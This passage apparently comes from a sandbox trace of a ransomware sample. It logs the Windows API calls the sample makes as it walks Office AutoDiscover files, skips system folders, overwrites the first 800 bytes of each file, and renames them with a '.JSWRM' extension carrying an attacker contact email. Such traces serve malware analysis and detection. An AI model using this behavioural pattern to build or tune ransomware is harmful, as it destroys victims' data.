hTemplateFile=0x0) returned 0x238 [0137.976] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0137.976] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.976] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.007] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.007] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.007] CloseHandle (hObject=0x238) returned 1 [0138.007] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.HK.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.hk.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.HK.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.hk.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.009] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c98fe3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.MX.XML", cAlternateFileName="YAEA08~1.XML")) returned 1 [0138.009] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2=".") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="..") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="...") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="windows") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="recovery") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="perflogs") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="documents and settings") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="system volume information") returned 1 [0138.010] lstrcmpiW (lpString1="YAHOO.COM.MX.XML", lpString2="msocache") returned 1 [0138.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MX.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MX.XML", cchWideChar=16, lpMultiByteStr=0x240f70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.MX.XML", lpUsedDefaultChar=0x0) returned 16 [0138.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MX.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MX.XML", cchWideChar=16, lpMultiByteStr=0x240f20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.MX.XML", lpUsedDefaultChar=0x0) returned 16 [0138.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.MX.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.mx.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.011] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0138.011] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.011] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.013] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.013] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.013] CloseHandle (hObject=0x238) returned 1 [0138.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.MX.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.mx.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.MX.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.mx.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.014] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c98fe3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.MY.XML", cAlternateFileName="YA0670~1.XML")) returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2=".") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="..") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="...") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="windows") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="recovery") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="perflogs") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="documents and settings") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="system volume information") returned 1 [0138.014] lstrcmpiW (lpString1="YAHOO.COM.MY.XML", lpString2="msocache") returned 1 [0138.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MY.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MY.XML", cchWideChar=16, lpMultiByteStr=0x241358, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.MY.XML", lpUsedDefaultChar=0x0) returned 16 [0138.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MY.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.MY.XML", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.MY.XML", lpUsedDefaultChar=0x0) returned 16 [0138.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.MY.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.my.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.015] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0138.015] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.015] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.017] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.017] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.017] CloseHandle (hObject=0x238) returned 1 [0138.017] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.MY.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.my.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.MY.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.my.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.018] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.PH.XML", cAlternateFileName="YA6D1B~1.XML")) returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2=".") returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="..") returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="...") returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="windows") returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="recovery") returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="perflogs") returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="documents and settings") returned 1 [0138.018] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.019] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="system volume information") returned 1 [0138.019] lstrcmpiW (lpString1="YAHOO.COM.PH.XML", lpString2="msocache") returned 1 [0138.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.PH.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.PH.XML", cchWideChar=16, lpMultiByteStr=0x241268, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.PH.XML", lpUsedDefaultChar=0x0) returned 16 [0138.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.PH.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.PH.XML", cchWideChar=16, lpMultiByteStr=0x241290, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.PH.XML", lpUsedDefaultChar=0x0) returned 16 [0138.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.PH.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.ph.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.020] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0138.020] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.020] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.023] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.023] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.023] CloseHandle (hObject=0x238) returned 1 [0138.024] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.PH.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.ph.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.PH.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.ph.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.039] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c98fe3e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c98fe3e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c98fe3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.SG.XML", cAlternateFileName="YAC50A~1.XML")) returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2=".") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="..") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="...") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="windows") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="recovery") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="perflogs") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="documents and settings") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="system volume information") returned 1 [0138.039] lstrcmpiW (lpString1="YAHOO.COM.SG.XML", lpString2="msocache") returned 1 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.SG.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.SG.XML", cchWideChar=16, lpMultiByteStr=0x240f20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.SG.XML", lpUsedDefaultChar=0x0) returned 16 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.SG.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.SG.XML", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.SG.XML", lpUsedDefaultChar=0x0) returned 16 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.SG.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.sg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.040] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0138.040] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.040] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.042] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.042] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0138.042] CloseHandle (hObject=0x238) returned 1 [0138.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.SG.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.sg.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.SG.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.sg.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.043] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c969bd6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c969bd6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c98fe3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="YAHOO.COM.TW.XML", cAlternateFileName="YAB0F6~1.XML")) returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2=".") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="..") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="...") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="windows") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="recovery") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="perflogs") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="documents and settings") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="system volume information") returned 1 [0138.043] lstrcmpiW (lpString1="YAHOO.COM.TW.XML", lpString2="msocache") returned 1 [0138.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.TW.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.TW.XML", cchWideChar=16, lpMultiByteStr=0x241128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.TW.XML", lpUsedDefaultChar=0x0) returned 16 [0138.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.TW.XML", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0138.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YAHOO.COM.TW.XML", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YAHOO.COM.TW.XML", lpUsedDefaultChar=0x0) returned 16 [0138.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OutlookAutoDiscover\\YAHOO.COM.TW.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlookautodiscover\\yahoo.com.tw.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.044] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=812) returned 1 [0138.044] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.044] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0138.046] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.046] WriteFile (in: 